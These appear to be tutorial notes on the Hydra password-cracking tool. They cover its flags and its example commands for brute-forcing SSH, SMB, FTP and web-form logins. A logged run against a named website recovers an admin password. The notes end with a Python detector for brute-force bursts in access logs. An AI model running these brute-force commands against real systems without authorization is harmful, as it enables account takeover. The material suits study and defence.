Hydra

  • Online password cracking tool
  • Supports many protocols (authentication)
    • Each protocol submits authentication data in its own format
    • Success or failure is judged from the response returned for the submitted data
    • adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
    • hydra -l [user] -p [pass] [service://server[:PORT][/OPT]]
      hydra -l user -p password ftp://1.1.1.1:2121
      hydra -L user.txt -P pass.txt smb://1.1.1.0/24
      hydra -l user -P pass.txt -M targets.txt ssh
      hydra -C cred.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      • -C: credentials file in login:pass format
      • hydra -U pop3s  # show the options available for a module
      • -R: resume a previous unfinished session (hydra.restore)
      • -I: start the scan over (ignore hydra.restore)
      • -S: connect over SSL (-O uses the obsolete SSLv2/v3)
      • -x MIN:MAX:CHARSET (a = lowercase, A = uppercase, 1 = digits)
        • -x 3:5:aA1
        • -x 5:5:/%,
      • -e nsr: n = empty password, s = username as password, r = reversed username as password
      • -u: loop over users (the default is to loop over passwords)
      • -o: write results to a file
      • -f/-F: exit on success (-f per host, -F global)
      • -t/-T: concurrent connections per host / concurrent connections overall
      • -c: delay between login requests
      • -4/-6: IPv4/IPv6
      • -v/-V: verbose output / show every login attempt
    • Password cracking for form-based web applications
    • hydra -l admin -P pass.txt 192.168.20.10 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:S=index.php" -t 1 -vV
    • F=login.php  # S= marks success, F= marks failure
    • C=/page/cookie:H='UA:firefox'  # page to fetch the cookie from, and an HTTP header to send
    • https-post-form, http-get-form, https-get-form
    • hydra -U http-post-form  # show the module's parameters

Example: brute-forcing a login form

hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV

    /usr/share/wordlists                                       14m 26s   root@kali  0.03   15:40:29  
❯ hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-10 15:40:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://www.c1moon.com:80/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target www.c1moon.com - login "admin" - pass "123456" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "password" - 2 of 10000 [child 1] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "12345678" - 3 of 10000 [child 2] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "qwerty" - 4 of 10000 [child 3] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "123456789" - 5 of 10000 [child 4] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "12345" - 6 of 10000 [child 5] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "1234" - 7 of 10000 [child 6] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "111111" - 8 of 10000 [child 7] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "1234567" - 9 of 10000 [child 8] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "dragon" - 10 of 10000 [child 9] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "123123" - 11 of 10000 [child 10] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "baseball" - 12 of 10000 [child 11] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "abc123" - 13 of 10000 [child 12] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "football" - 14 of 10000 [child 13] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "monkey" - 15 of 10000 [child 14] (0/0)
[ATTEMPT] target www.c1moon.com - login "admin" - pass "letmein" - 16 of 10000 [child 15] (0/0)
[80][http-post-form] host: www.c1moon.com login: admin password: 123456
[STATUS] attack finished for www.c1moon.com (valid pair found)
1 of 1 target successfully completed, 1 valid password found
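
Seen from the server side, the run above (16 parallel tasks posting to one login path) leaves a burst of POST requests from a single address in the access log. The following is an added example, not part of the original notes: a sliding-window detector over combined-format access-log lines. The log lines are constructed, the window and threshold are illustrative, and the string "Mozilla/5.0 (Hydra)" is assumed to be the tool's default User-Agent; since the H= option described above can replace that header, the request rate is the primary signal.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined log format: ip, timestamp, method, path, status, user agent.
LINE_RE = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
HYDRA_UA = "(Hydra)"  # assumption: marker in the tool's default User-Agent
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"

def _line(ip, sec, method, ua):
    """Build one constructed log line (sample data, not real traffic)."""
    return (f'{ip} - - [10/Nov/2022:15:40:{sec:02d} +0800] '
            f'"{method} /admin/index.php HTTP/1.1" 200 512 "-" "{ua}"')

SAMPLE = (
    # 16 POSTs in 2 s carrying the default tool User-Agent
    [_line("203.0.113.7", 38 + i // 8, "POST", "Mozilla/5.0 (Hydra)") for i in range(16)]
    # 12 POSTs in 3 s with a browser User-Agent (header overridden)
    + [_line("203.0.113.9", 40 + i // 4, "POST", FIREFOX) for i in range(12)]
    # an ordinary user: two logins 45 s apart and one page view
    + [_line("198.51.100.20", s, "POST", FIREFOX) for s in (5, 50)]
    + [_line("198.51.100.20", 6, "GET", FIREFOX)]
)

def detect(lines, login_path="/admin/index.php",
           window=timedelta(seconds=10), threshold=10):
    """Return {ip: {"max_burst": n, "hydra_ua": bool}} for suspicious sources."""
    recent = defaultdict(deque)   # per-IP timestamps inside the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # skip lines that are not in the expected format
        ip, ts, method, path, _status, ua = m.groups()
        if method != "POST" or path.split("?")[0] != login_path:
            continue
        t = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        q.append(t)
        while t - q[0] > window:  # drop attempts older than the window
            q.popleft()
        tool_ua = HYDRA_UA in ua
        if len(q) >= threshold or tool_ua:
            a = alerts.setdefault(ip, {"max_burst": 0, "hydra_ua": False})
            a["max_burst"] = max(a["max_burst"], len(q))
            a["hydra_ua"] = a["hydra_ua"] or tool_ua
    return alerts

if __name__ == "__main__":
    for ip, info in detect(SAMPLE).items():
        print(ip, info)
```

The same per-source counter can drive a lockout or rate limit on the login handler instead of only raising an alert.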